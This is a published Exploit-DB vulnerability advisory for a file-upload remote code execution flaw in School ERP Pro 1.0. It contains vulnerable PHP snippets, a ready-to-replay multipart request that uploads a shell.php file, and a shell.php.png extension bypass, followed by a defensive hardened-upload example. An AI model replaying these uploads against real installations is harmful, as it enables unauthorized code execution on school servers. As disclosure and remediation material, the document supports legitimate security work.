School ERP Pro 1.0 – Remote Code Execution

Author: Besim
Date: 2020-04-28
Source: https://www.exploit-db.com/exploits/48392/

# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
    
Description
-------------------------------------------
A student can send a message to the admin with an attachment. Because the
attachment's name and extension are never validated, the student can use the
same feature to upload a PHP file into the application's upload directory and
execute code on the server.

------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send a message to the admin with an attachment
------------------------------------
$image_file = basename($_FILES['newimage']['name'][$i]);
// The client-supplied name is split on dots and reused as-is
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
// $t is never assigned (rand() is commented out), so the stored name is
// predictable: <basename><timestamp>.<client extension>
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
// No extension allow-list or content check: a file named shell.php is
// stored as shell.php inside the web-served upload directory
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
'`es_messagesid`'=> $id,
'`message_doc`' => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
    
---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------

POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data; boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"

DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"

<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php

<?php phpinfo(); ?>

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"

1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"

Send
-----------------------------2104557667975595321153031663--
    
    
------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update a user's profile photo
------------------------------------
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
    // Splits on every dot: for "shell.php.png", $ext[0] is "shell" and
    // $ext[1] is "php"; the trailing "png" segment is never used
    $ext = explode(".",$_FILES['pre_image']['name']);
    $str = date("mdY_hms");
    $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
    $updir = "images/student_photos/";
    $uppath = $updir.$new_thumbname;
    // No extension allow-list or content check before the file is stored
    move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
    $file = $new_thumbname;
}
    
------------------------------------
Bypass Technique:
------------------------------------

$_FILES['pre_image']['name']   --> shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
$ext[0]                        --> shell
$ext[1]                        --> php
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
final filename                 --> st_<date>_shell.php

Only the first two segments of the name are used, so a name that appears to
end in .png is stored with a .php extension.
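The explode(".") naming defect shared by both snippets, beside a hardened replacement, as an added example in PHP that is not code from the advisory or from School ERP Pro. The function names, the allow-list, and the two constructed upload files are assumptions for illustration.

```php
<?php
// Added example, not code from the advisory or from School ERP Pro.
// Function names, allow-list and sample files are assumptions.

// Reproduces the naming in pre-editstudent.inc.php (sendmail.inc.php builds
// its name the same way). explode(".") splits on every dot, so for
// "shell.php.png" $ext[0] is "shell" and $ext[1] is "php": the stored file
// ends in .php although the name looked like an image.
function vulnerable_name(string $clientName, string $stamp): string
{
    $ext = explode(".", $clientName);
    return "st_" . $stamp . "_" . $ext[0] . "." . $ext[1];
}

// Hardened replacement: use only the LAST extension, allow-list it, check
// the file's real content with fileinfo, and let the server pick the name.
function safe_name(string $clientName, string $tmpPath, string $stamp): ?string
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;                       // extension not on the allow-list
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== $allowed[$ext]) {
        return null;                       // content does not match the extension
    }
    // Random server-chosen base name: nothing from the client reaches the path
    return "st_" . $stamp . "_" . bin2hex(random_bytes(8)) . "." . $ext;
}

// Constructed inputs: a PHP script and a minimal PNG (signature + IHDR),
// both submitted under the advisory's bypass name "shell.php.png".
$stamp = date("mdY_hms");
$phpFile = tempnam(sys_get_temp_dir(), "up");
file_put_contents($phpFile, "<?php phpinfo(); ?>");
$pngFile = tempnam(sys_get_temp_dir(), "up");
file_put_contents($pngFile, "\x89PNG\r\n\x1a\n" . pack("N", 13) . "IHDR"
    . pack("NN", 1, 1) . "\x08\x06\x00\x00\x00");

echo "vulnerable: ", vulnerable_name("shell.php.png", $stamp), "\n";
var_dump(safe_name("shell.php.png", $phpFile, $stamp)); // rejected: content is PHP
var_dump(safe_name("shell.php.png", $pngFile, $stamp)); // accepted with a .png name
unlink($phpFile);
unlink($pngFile);
```

Run with the PHP CLI; the fileinfo extension, enabled by default, is required for the content check.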